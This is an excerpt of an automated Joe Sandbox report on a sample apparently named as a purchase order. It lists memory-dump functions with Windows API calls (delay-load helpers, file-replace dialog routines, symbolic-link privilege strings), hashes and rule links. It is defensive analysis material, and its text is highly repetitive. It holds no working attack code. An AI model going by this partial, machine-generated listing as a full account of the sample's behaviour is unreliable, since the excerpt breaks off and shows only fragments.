Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b15f76e6e476e885ee39e15a064b24a024d424cfb649b01722f596ce8e43c04
Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
Opcode Fuzzy Hash: 0b15f76e6e476e885ee39e15a064b24a024d424cfb649b01722f596ce8e43c04
Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 50b8deae2ba749cfb636cccb41190c9e02ab548f0097d120a84ea50dd3521afa
Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
Opcode Fuzzy Hash: 50b8deae2ba749cfb636cccb41190c9e02ab548f0097d120a84ea50dd3521afa
Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3eb6b9425c77dca17a0de4ad1450fcee55e8b35a06af854d88a85eda52d9ea90
Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
Opcode Fuzzy Hash: 3eb6b9425c77dca17a0de4ad1450fcee55e8b35a06af854d88a85eda52d9ea90
Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a7da291aaf69ddbe6aa24b16e8d89251da5259318c812e1152342b8ab6469c3
Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
Opcode Fuzzy Hash: 4a7da291aaf69ddbe6aa24b16e8d89251da5259318c812e1152342b8ab6469c3
Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c4932670b38e2dab36fb48475c46fd6acea2da36fd97e84afccedabf8fc8e9e
Instruction ID: 4e3c93c94b85962dc0d86c9a0b990a82f2abae36e5a97531ef4cddd21d30bd0b
Opcode Fuzzy Hash: 3c4932670b38e2dab36fb48475c46fd6acea2da36fd97e84afccedabf8fc8e9e
Instruction Fuzzy Hash: 4BA011C22A8002BE300822A0AC02CFB02CEC8C0B2033088AFF822820E0B8C088000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33c821d854faa10a138c46120af5dca8f25e20ac0d6c44a7e963d31be7fe5d03
Instruction ID: 4e3c93c94b85962dc0d86c9a0b990a82f2abae36e5a97531ef4cddd21d30bd0b
Opcode Fuzzy Hash: 33c821d854faa10a138c46120af5dca8f25e20ac0d6c44a7e963d31be7fe5d03
Instruction Fuzzy Hash: 4BA011C22A8002BE300822A0AC02CFB02CEC8C0B2033088AFF822820E0B8C088000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE580

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46e6bcacff46d9293fdb75339445849fed00f899f850f4a5e426711953ca7942
Instruction ID: f1bfc1936bf3f2cfb1aede414c75ca2733b9f88594463ea7fe7f12840683e117
Opcode Fuzzy Hash: 46e6bcacff46d9293fdb75339445849fed00f899f850f4a5e426711953ca7942
Instruction Fuzzy Hash: A5A011C22A80023E300822A0AC02CFB0ACEC8E0B2233082AFF820A20E0B8C088000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: baf6c387625ca1601ec61197e636e14de2a72625c9846f38eae3a4943fcc55cd
Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
Opcode Fuzzy Hash: baf6c387625ca1601ec61197e636e14de2a72625c9846f38eae3a4943fcc55cd
Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1eca4ef966d2f19ae2066979d5df3a23e1e75ef4239d9d51c89293ba3b1cc5bd
Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
Opcode Fuzzy Hash: 1eca4ef966d2f19ae2066979d5df3a23e1e75ef4239d9d51c89293ba3b1cc5bd
Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3f90b163828601474e6f349b3541c7a8cb37a0390d1eb1921078087cdf955e86
Instruction ID: ee0865d1aafa13104ab2b47ddf555df7138e3c77fc72d81728d60fcf8062cf1c
Opcode Fuzzy Hash: 3f90b163828601474e6f349b3541c7a8cb37a0390d1eb1921078087cdf955e86
Instruction Fuzzy Hash: 15A011C22A8802BE30082200AC02CFB0ACEC0C2F203308AEEF822800A0B8C08C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00BA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BA9F0C

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: bed398f22294a419b43dd156aa34f6b852cccb26c2ece21f4b890cb028933646
Instruction ID: 101c3d80819b2bf305199672ed6bde0d2d6b7156a12237a5d9c9f651737d16f6
Opcode Fuzzy Hash: bed398f22294a419b43dd156aa34f6b852cccb26c2ece21f4b890cb028933646
Instruction Fuzzy Hash: 77A0113008000A8A8E002B30CA2820CBB20EB20BC030082A8A00ACB0A2CB22880B8A02

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00BBAE72,C:\Users\user\Desktop,00000000,00BE946A,00000006), ref: 00BBAC08

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: cc8bf6324207a7db949a0868adcc129a3b083d5e661745baadda9432d38dbab4
Instruction ID: 8b8838450b7b107e1208f0faa0fc9235b4fa4c84e9e1727b167589595a0967c0
Opcode Fuzzy Hash: cc8bf6324207a7db949a0868adcc129a3b083d5e661745baadda9432d38dbab4
Instruction Fuzzy Hash: 78A011302022028B82000B328F0AA0EBBAAAFA2B00F00C02AA00080030EB30C820AA02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BBC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BBC2B1
EndDialog.USER32(?,00000006), ref: 00BBC2C4
GetDlgItem.USER32(?,0000006C), ref: 00BBC2E0
SetFocus.USER32(00000000), ref: 00BBC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00BBC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BBC358
FindFirstFileW.KERNEL32(?,?), ref: 00BBC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBC3D4
_swprintf.LIBCMT ref: 00BBC404

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BBC417
FindClose.KERNEL32(00000000), ref: 00BBC41E
_swprintf.LIBCMT ref: 00BBC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00BBC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BBC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BBC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBC509
_swprintf.LIBCMT ref: 00BBC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BBC548
_swprintf.LIBCMT ref: 00BBC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00BBC5AF

Part of subcall function 00BBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBAF35
Part of subcall function 00BBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BDE72C,?,?), ref: 00BBAF84

Strings

REPLACEFILEDLG, xrefs: 00BBC247
%s %s %s, xrefs: 00BBC3F2, 00BBC527
%s %s, xrefs: 00BBC469, 00BBC58E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: da89b3ed59feb383d12f48e4dcf96c756c54acbfae94f76861113474628acc34
Instruction ID: 5094752ba9c9dfd44127d9274e343ebbdf9bd91e6ddc4379684da3817d573cdd
Opcode Fuzzy Hash: da89b3ed59feb383d12f48e4dcf96c756c54acbfae94f76861113474628acc34
Instruction Fuzzy Hash: 94916272548344BBD221DBA4CC49FFF7BECEB4AB00F04485AB649D6091EBB5A6048762

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA6FAA
_wcslen.LIBCMT ref: 00BA7013
_wcslen.LIBCMT ref: 00BA7084

Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00

Part of subcall function 00BAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641,000000FF), ref: 00BAA1F1
Part of subcall function 00BAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641), ref: 00BAA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BA7139
CloseHandle.KERNEL32(00000000), ref: 00BA7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BA7298

Part of subcall function 00BA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BA73BC,?,?,?,00000000), ref: 00BA9DBC
Part of subcall function 00BA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BA9E70

Part of subcall function 00BA9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00BA95D6,?,?,?,?,?,00BD2641,000000FF), ref: 00BA963B

Part of subcall function 00BAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501
Part of subcall function 00BAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BA6FCC
SeRestorePrivilege, xrefs: 00BA6FC2
UNC\, xrefs: 00BA7051
\??\, xrefs: 00BA702B

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: d57e2f49bd5a8418f75ce5d14a751a5bbd35fb7f0f4078296447abf3effa7cca
Instruction ID: af615325eedd3d210b6a26f6ccd16492fd5d144cce7017e4fd002eca0ad86985
Opcode Fuzzy Hash: d57e2f49bd5a8418f75ce5d14a751a5bbd35fb7f0f4078296447abf3effa7cca
Instruction Fuzzy Hash: F2C1C67194C644AEDB21DB74CC91FEEB3E8EF06700F00459AF956E7182EB74AA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00BCDA34

Strings

1#SNAN, xrefs: 00BCEC33
1#QNAN, xrefs: 00BCEC3A
1#IND, xrefs: 00BCEC2C
1#INF, xrefs: 00BCEC41

Memory Dump Source

